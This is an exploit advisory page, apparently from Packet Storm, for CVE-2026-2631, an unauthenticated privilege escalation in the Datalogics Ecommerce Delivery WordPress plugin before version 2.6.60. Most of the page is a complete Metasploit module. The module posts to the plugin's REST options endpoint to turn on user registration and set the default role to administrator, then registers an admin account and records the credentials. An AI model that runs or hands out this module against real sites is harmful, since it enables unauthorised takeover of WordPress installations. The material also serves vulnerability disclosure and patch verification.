📄 WordPress Datalogics Ecommerce Delivery Privilege Escalation

🗓️ 31 Mar 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 116 Views

Critical flaw in Datalogics Ecommerce Delivery plugin before 2.6.60 allows unauthenticated updates to enable user registration and create an admin account.

Reporter	Title	Published	Views	Family All 14
GithubExploit	Exploit for CVE-2026-2631	20 Mar 202609:32	–	githubexploit
ATTACKERKB	CVE-2026-2631	11 Mar 202606:00	–	attackerkb
Circl	CVE-2026-2631	11 Mar 202609:00	–	circl
CNNVD	WordPress plugin Datalogics Ecommerce Delivery 安全漏洞	11 Mar 202600:00	–	cnnvd
CVE	CVE-2026-2631	11 Mar 202606:00	–	cve
Cvelist	CVE-2026-2631 Datalogics Ecommerce Delivery < 2.6.60 - Unauthenticated Privilege Escalation	11 Mar 202606:00	–	cvelist
EUVD	EUVD-2026-11097	11 Mar 202606:31	–	euvd
EUVD	EUVD-2026-11098	11 Mar 202606:00	–	euvd
NVD	CVE-2026-2631	11 Mar 202606:17	–	nvd
Patchstack	WordPress Datalogics Ecommerce Delivery plugin < 2.6.60 - Unauthenticated Privilege Escalation vulnerability	12 Mar 202607:01	–	patchstack

===============================================================================================================================================================================
    | # Title     : WordPress Datalogics Ecommerce Delivery Plugin < 2.6.60 Privilege Escalation via Insecure Configuration Manipulation Leading to Admin Account Creation        |
    | # Author    : indoushka                                                                                                                                                     |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                                                              |
    | # Vendor    : https://fr.wordpress.org/plugins/datalogics/                                                                                                                  |
    ================================================================================================================================================================================
    
    [+] Summary    : A critical vulnerability exists in the Datalogics Ecommerce Delivery WordPress plugin versions prior to 2.6.60, allowing unauthenticated attackers to modify 
                     sensitive plugin and WordPress configuration options due to insufficient access control in the exposed REST API.
                     The flaw enables attackers to enable user registration, change the default user role to administrator, and leverage the public registration mechanism to create an administrative account. 
    				 This results in a full privilege escalation chain, ultimately leading to complete takeover of affected WordPress installations.
                     The issue is caused by improper authentication and authorization checks on configuration update endpoints, exposing critical administrative functionality to unauthenticated users.
    				 
    [+] POC   :  
    
    ##
    # CVE-2026-2631
    # Datalogics Ecommerce Delivery < 2.6.60 Privilege Escalation
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HTTP::Wordpress
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress Datalogics Ecommerce Delivery Privilege Escalation',
            'Description' => %q{
              This module exploits an unauthenticated privilege escalation vulnerability
              in the Datalogics Ecommerce Delivery plugin (< 2.6.60).
    
              The API allows insecure modification of WordPress options without authentication,
              enabling attackers to:
    
              1. Enable user registration
              2. Set default role to administrator
              3. Create a new admin account via public registration flow
            },
            'Author' => [
              'indoushka'
            ],
            'License' => MSF_LICENSE,
            'References' => [
              [ 'CVE', 'CVE-2026-2631' ]
            ],
            'DisclosureDate' => '2026-01-01',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [CONFIG_CHANGES]
            }
          )
        )
    
        register_options([
          OptString.new('USERNAME', [true, 'Admin username', 'admin_poc']),
          OptString.new('EMAIL', [true, 'Admin email', '[email protected]']),
          OptString.new('PASSWORD', [true, 'Admin password', 'P@ssw0rd123']),
          OptString.new('TARGETURI', [true, 'WordPress base path', '/'])
        ])
      end
    
      def run_host(ip)
        @uri = normalize_uri(target_uri.path)
    
        print_status("Target: #{rhost}:#{rport}#{@uri}")
    
        unless enable_registration
          print_error("Failed to enable registration")
          return
        end
    
        unless set_default_role
          print_error("Failed to set default role")
          return
        end
    
        if register_admin
          print_good("Admin account created successfully!")
    
          report_cred(
            ip: rhost,
            port: rport,
            service_name: 'wordpress',
            user: datastore['USERNAME'],
            password: datastore['PASSWORD'],
            proof: "Admin created via Datalogics exploit"
          )
        else
          print_error("Exploitation failed")
        end
      end
    
      def enable_registration
        uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/json',
          'data' => {
            'users_can_register' => 1
          }.to_json
        })
    
        res && res.code == 200
      end
    
      def set_default_role
        uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/json',
          'data' => {
            'default_role' => 'administrator'
          }.to_json
        })
    
        res && res.code == 200
      end
    
      def register_admin
        uri = normalize_uri(@uri, 'wp-login.php?action=register')
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/x-www-form-urlencoded',
          'vars_post' => {
            'user_login' => datastore['USERNAME'],
            'user_email' => datastore['EMAIL'],
            'user_pass' => datastore['PASSWORD']
          }
        })
    
        res && res.code == 200
      end
    
      def report_cred(opts)
        service_data = {
          address: opts[:ip],
          port: opts[:port],
          service_name: opts[:service_name],
          protocol: 'tcp'
        }
    
        credential_data = {
          origin_type: :service,
          module_fullname: self.fullname,
          username: opts[:user],
          private_data: opts[:password],
          private_type: :password,
          proof: opts[:proof]
        }.merge(service_data)
    
        create_credential_login({
          core: create_credential(credential_data),
          status: Metasploit::Model::Login::Status::SUCCESSFUL
        })
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

31 Mar 2026 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 3.19.8

EPSS0.00082

SSVC